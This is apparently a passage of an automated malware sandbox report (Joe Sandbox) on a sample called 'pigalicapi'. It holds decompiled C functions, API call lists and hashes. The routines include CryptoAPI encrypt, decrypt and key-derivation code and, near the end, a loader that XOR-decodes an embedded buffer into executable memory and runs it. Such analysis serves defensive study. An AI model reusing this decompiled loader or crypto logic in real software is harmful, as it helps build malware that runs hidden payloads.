                                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                                          0x04008bb6
                                                                                                                                                                                                                                                                                          0x04008bc1
                                                                                                                                                                                                                                                                                          0x04008ce7
                                                                                                                                                                                                                                                                                          0x04008ced
                                                                                                                                                                                                                                                                                          0x04008be5
                                                                                                                                                                                                                                                                                          0x04008be5
                                                                                                                                                                                                                                                                                          0x04008bf5
                                                                                                                                                                                                                                                                                          0x04008bff
                                                                                                                                                                                                                                                                                          0x04008c07
                                                                                                                                                                                                                                                                                          0x04008c09
                                                                                                                                                                                                                                                                                          0x04008c0f
                                                                                                                                                                                                                                                                                          0x04008c19
                                                                                                                                                                                                                                                                                          0x04008c2d
                                                                                                                                                                                                                                                                                          0x04008c38
                                                                                                                                                                                                                                                                                          0x04008c38
                                                                                                                                                                                                                                                                                          0x04008c19
                                                                                                                                                                                                                                                                                          0x04008c42
                                                                                                                                                                                                                                                                                          0x04008c59
                                                                                                                                                                                                                                                                                          0x04008c61
                                                                                                                                                                                                                                                                                          0x04008c65
                                                                                                                                                                                                                                                                                          0x04008c71
                                                                                                                                                                                                                                                                                          0x04008c79
                                                                                                                                                                                                                                                                                          0x04008c7b
                                                                                                                                                                                                                                                                                          0x04008c82
                                                                                                                                                                                                                                                                                          0x04008c8b
                                                                                                                                                                                                                                                                                          0x04008c99
                                                                                                                                                                                                                                                                                          0x04008ca1
                                                                                                                                                                                                                                                                                          0x04008cae
                                                                                                                                                                                                                                                                                          0x04008cb7
                                                                                                                                                                                                                                                                                          0x04008cc1
                                                                                                                                                                                                                                                                                          0x04008cc9
                                                                                                                                                                                                                                                                                          0x04008cce
                                                                                                                                                                                                                                                                                          0x04008cce
                                                                                                                                                                                                                                                                                          0x04008cc9
                                                                                                                                                                                                                                                                                          0x04008ca1
                                                                                                                                                                                                                                                                                          0x04008cd5
                                                                                                                                                                                                                                                                                          0x04008cd5
                                                                                                                                                                                                                                                                                          0x04008ce1
                                                                                                                                                                                                                                                                                          0x04008ce1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04008c42

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008BFF
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008C09
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008C38
                                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 04008C59
                                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 04008C71
                                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 04008C99
                                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 04008CC1
                                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04008CD5
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008CE1
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008C28
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008BF0
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Context$AcquireParam$CreateDataDestroyErrorLastRelease
                                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                          • API String ID: 731959895-947817771
                                                                                                                                                                                                                                                                                          • Opcode ID: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
                                                                                                                                                                                                                                                                                          • Instruction ID: 7e4f484856ccd150e5ceb993e2d8e8a423e5286abb412a2c571c9cca470c08b6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c04671c4f16af3ba3265102b35b0728ece87a0365c7276e8c5171731790e3264
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E41C772A50209ABEB14DF94C849FAFB7B9FB44705F14C529A601B61C0D7B8AA84CB60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04008A70(BYTE* _a4, DWORD* _a8, BYTE* _a12, int _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                                          				long* _v24;
                                                                                                                                                                                                                                                                                          				char* _t35;
                                                                                                                                                                                                                                                                                          				int _t36;
                                                                                                                                                                                                                                                                                          				int _t38;
                                                                                                                                                                                                                                                                                          				int _t43;
                                                                                                                                                                                                                                                                                          				char* _t62;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                                          					L16:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_t35 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          					_t36 = CryptAcquireContextA( &_v12, _t35, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                          					if(_t36 == 0) {
                                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                          							_t62 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t62, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                                          						_t38 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v20); // executed
                                                                                                                                                                                                                                                                                          						if(_t38 != 0) {
                                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                                          							_t43 = CryptImportKey(_v12, _a12, _a16, _v20, 1,  &_v24); // executed
                                                                                                                                                                                                                                                                                          							if(_t43 != 0) {
                                                                                                                                                                                                                                                                                          								_v8 = CryptDecrypt(_v24, 0, 1, 0, _a4, _a8);
                                                                                                                                                                                                                                                                                          								CryptDestroyKey(_v24);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0); // executed
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L16;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                                          0x04008a76
                                                                                                                                                                                                                                                                                          0x04008a81
                                                                                                                                                                                                                                                                                          0x04008ba3
                                                                                                                                                                                                                                                                                          0x04008ba9
                                                                                                                                                                                                                                                                                          0x04008ab9
                                                                                                                                                                                                                                                                                          0x04008ab9
                                                                                                                                                                                                                                                                                          0x04008ac9
                                                                                                                                                                                                                                                                                          0x04008ad3
                                                                                                                                                                                                                                                                                          0x04008adb
                                                                                                                                                                                                                                                                                          0x04008ae3
                                                                                                                                                                                                                                                                                          0x04008aed
                                                                                                                                                                                                                                                                                          0x04008b01
                                                                                                                                                                                                                                                                                          0x04008b0c
                                                                                                                                                                                                                                                                                          0x04008b0c
                                                                                                                                                                                                                                                                                          0x04008aed
                                                                                                                                                                                                                                                                                          0x04008b16
                                                                                                                                                                                                                                                                                          0x04008b1c
                                                                                                                                                                                                                                                                                          0x04008b37
                                                                                                                                                                                                                                                                                          0x04008b3f
                                                                                                                                                                                                                                                                                          0x04008b41
                                                                                                                                                                                                                                                                                          0x04008b5e
                                                                                                                                                                                                                                                                                          0x04008b66
                                                                                                                                                                                                                                                                                          0x04008b80
                                                                                                                                                                                                                                                                                          0x04008b87
                                                                                                                                                                                                                                                                                          0x04008b87
                                                                                                                                                                                                                                                                                          0x04008b91
                                                                                                                                                                                                                                                                                          0x04008b91
                                                                                                                                                                                                                                                                                          0x04008b9d
                                                                                                                                                                                                                                                                                          0x04008b9d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04008b16

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008AFC
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008AC4
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyImport$DecryptErrorLastRelease
                                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                          • API String ID: 1555285084-947817771
                                                                                                                                                                                                                                                                                          • Opcode ID: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
                                                                                                                                                                                                                                                                                          • Instruction ID: 912f8c379191964defa89f3bac9fc05279983c51f6e5ced775be03f2308b6df6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a29918078d8c2f64865fcd98cb153a1075290469360e4a9c607703ac9d42e64f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A31CDB5A04209EBFB58DF94D849BEE77B8FB48705F14C518F601B62C0C7B8A984CB61
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(02B54054,02B54040), ref: 02B51047
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02B5104E
                                                                                                                                                                                                                                                                                            • Part of subcall function 02B51B30: SetLastError.KERNEL32(0000000D,?,02B51070,?,00000040), ref: 02B51B3D
                                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(000000C1), ref: 02B51096
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.718905728.0000000002B51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B51000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2b51000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1866314245-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8755cf1ed10c32a1ba26c39d3e7ae57ac964654d83a3bc6cff562a7273872012
                                                                                                                                                                                                                                                                                          • Instruction ID: 1c76909efeea957f5d01509bf932458c31ab8a7e66b7186ce23f10946504b2a5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8755cf1ed10c32a1ba26c39d3e7ae57ac964654d83a3bc6cff562a7273872012
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0EF1D5B4E11219EFDB04CF98D994BAEB7B1EF48304F248598E909AB341D775EA41CF90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 040048EB
                                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 0400490B
                                                                                                                                                                                                                                                                                          • CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 0400493C
                                                                                                                                                                                                                                                                                          • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 0400496F
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04004982
                                                                                                                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?), ref: 040049A9
                                                                                                                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,000002F0,00000000), ref: 040049CC
                                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000004,00000000,00000004,00000000), ref: 04004A07
                                                                                                                                                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 04004A34
                                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(?), ref: 04004A7D
                                                                                                                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 04004A8A
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04004AA5
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Hash$Destroy$CreateDataParam$ContextDecryptDeriveRelease
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2727466597-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 56f7e97ff9290496e290980ffb5b481f03a5a3792702acde3772e2a43a98712a
                                                                                                                                                                                                                                                                                          • Instruction ID: 825b94236ad970d67c54706e51f03fb1cf2707309f33405f466b5fd67a115f37
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56f7e97ff9290496e290980ffb5b481f03a5a3792702acde3772e2a43a98712a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E251FD71A54318ABEB65CF50CC45FEA77BCAB48B04F008598F609B61C0DB79AB84CF54
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                          			E04008970(intOrPtr _a4, intOrPtr* _a8, BYTE* _a12, int _a16) {
                                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                                          				char* _t27;
                                                                                                                                                                                                                                                                                          				int _t28;
                                                                                                                                                                                                                                                                                          				int _t33;
                                                                                                                                                                                                                                                                                          				char* _t47;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                                          					_t27 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          					_t28 = CryptAcquireContextA( &_v12, _t27, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                                          					if(_t28 == 0) {
                                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                                          							_t47 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t47, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                                          						if(CryptImportKey(_v12, _a12, _a16, 0, 1,  &_v20) != 0) {
                                                                                                                                                                                                                                                                                          							_t33 = _v20;
                                                                                                                                                                                                                                                                                          							__imp__CryptEncrypt(_t33, 0, 1, 0, _a4, _a8,  *_a8);
                                                                                                                                                                                                                                                                                          							_v8 = _t33;
                                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L12;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                                                                                          0x04008976
                                                                                                                                                                                                                                                                                          0x04008981
                                                                                                                                                                                                                                                                                          0x04008a60
                                                                                                                                                                                                                                                                                          0x04008a66
                                                                                                                                                                                                                                                                                          0x040089a5
                                                                                                                                                                                                                                                                                          0x040089a5
                                                                                                                                                                                                                                                                                          0x040089b5
                                                                                                                                                                                                                                                                                          0x040089bf
                                                                                                                                                                                                                                                                                          0x040089c7
                                                                                                                                                                                                                                                                                          0x040089cf
                                                                                                                                                                                                                                                                                          0x040089d9
                                                                                                                                                                                                                                                                                          0x040089ed
                                                                                                                                                                                                                                                                                          0x040089f8
                                                                                                                                                                                                                                                                                          0x040089f8
                                                                                                                                                                                                                                                                                          0x040089d9
                                                                                                                                                                                                                                                                                          0x04008a02
                                                                                                                                                                                                                                                                                          0x04008a04
                                                                                                                                                                                                                                                                                          0x04008a27
                                                                                                                                                                                                                                                                                          0x04008a3d
                                                                                                                                                                                                                                                                                          0x04008a41
                                                                                                                                                                                                                                                                                          0x04008a47
                                                                                                                                                                                                                                                                                          0x04008a4e
                                                                                                                                                                                                                                                                                          0x04008a4e
                                                                                                                                                                                                                                                                                          0x04008a5a
                                                                                                                                                                                                                                                                                          0x04008a5a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04008a02

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 040089BF
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 040089C9
                                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 040089F8
                                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008A1F
                                                                                                                                                                                                                                                                                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 04008A41
                                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 04008A4E
                                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008A5A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 040089B0
                                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 040089E8
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
                                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                          • API String ID: 3736710109-947817771
                                                                                                                                                                                                                                                                                          • Opcode ID: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
                                                                                                                                                                                                                                                                                          • Instruction ID: 073036156a227ab269f6199982c6e62e9abf2561c3e32999b52b046b74d0c6c6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D231FD75A40208EFFB54DFA4C849BAE77B9FB44701F14C658F605B62C0D7B8AA80CB51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                                                                                                                                                                          			E0080A0B0(void* __eflags, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                          				char _v260;
                                                                                                                                                                                                                                                                                          				void* _v264;
                                                                                                                                                                                                                                                                                          				void* _v268;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t24;
                                                                                                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t34;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t35;
                                                                                                                                                                                                                                                                                          				signed int _t54;
                                                                                                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t70;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t71;
                                                                                                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                                                                                                          				void* _t77;
                                                                                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t79 = __eflags;
                                                                                                                                                                                                                                                                                          				E00804A40();
                                                                                                                                                                                                                                                                                          				_t24 = LoadLibraryA("RICHED20.DLL"); // executed
                                                                                                                                                                                                                                                                                          				_push(0x40);
                                                                                                                                                                                                                                                                                          				_push(0x3000);
                                                                                                                                                                                                                                                                                          				_t70 = _t24;
                                                                                                                                                                                                                                                                                          				_push( &_v264);
                                                                                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                                                                                          				_push( &_v268);
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_v260 = 0;
                                                                                                                                                                                                                                                                                          				_v268 = 0;
                                                                                                                                                                                                                                                                                          				_v264 = 0x14d44;
                                                                                                                                                                                                                                                                                          				_t26 = E008154F5(_t79); // executed
                                                                                                                                                                                                                                                                                          				_t77 = (_t74 & 0xfffffff8) - 0x10c + 0x18;
                                                                                                                                                                                                                                                                                          				if(_t26 >= 0) {
                                                                                                                                                                                                                                                                                          					_t54 = 0;
                                                                                                                                                                                                                                                                                          					__eflags = _v264;
                                                                                                                                                                                                                                                                                          					if(__eflags > 0) {
                                                                                                                                                                                                                                                                                          						do {
                                                                                                                                                                                                                                                                                          							_t11 = _t54 - (((0x84210843 * _t54 >> 0x20) + _t54 >> 4 >> 0x1f) + ((0x84210843 * _t54 >> 0x20) + _t54 >> 4) << 5) - ((0x84210843 * _t54 >> 0x20) + _t54 >> 4 >> 0x1f) + ((0x84210843 * _t54 >> 0x20) + _t54 >> 4) + "ck?<PMVf>sn+p%d(>M!s$?ch*owqz+"; // 0x3c3f6b63
                                                                                                                                                                                                                                                                                          							_t12 = _t54 + 0x86bdb8; // 0x3c3f6b8b
                                                                                                                                                                                                                                                                                          							 *(_t54 + _v268) =  *_t11 ^  *_t12;
                                                                                                                                                                                                                                                                                          							_t54 = _t54 + 1;
                                                                                                                                                                                                                                                                                          							__eflags = _t54 - _v264;
                                                                                                                                                                                                                                                                                          						} while (__eflags < 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_v268();
                                                                                                                                                                                                                                                                                          					_t66 = E00809F00( &_v260, __eflags, _a12, _a16);
                                                                                                                                                                                                                                                                                          					FreeLibrary(_t70);
                                                                                                                                                                                                                                                                                          					E00804BA0();
                                                                                                                                                                                                                                                                                          					_t71 =  *0x8819f0; // 0x2e21058
                                                                                                                                                                                                                                                                                          					__eflags = _t71;
                                                                                                                                                                                                                                                                                          					if(_t71 != 0) {
                                                                                                                                                                                                                                                                                          						_t34 =  *_t71;
                                                                                                                                                                                                                                                                                          						__eflags = _t34;
                                                                                                                                                                                                                                                                                          						if(_t34 != 0) {
                                                                                                                                                                                                                                                                                          							E00815DE2(_t34);
                                                                                                                                                                                                                                                                                          							_t77 = _t77 + 4;
                                                                                                                                                                                                                                                                                          							 *_t71 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t20 = _t71 + 4; // 0x0
                                                                                                                                                                                                                                                                                          						_t35 =  *_t20;
                                                                                                                                                                                                                                                                                          						__eflags = _t35;
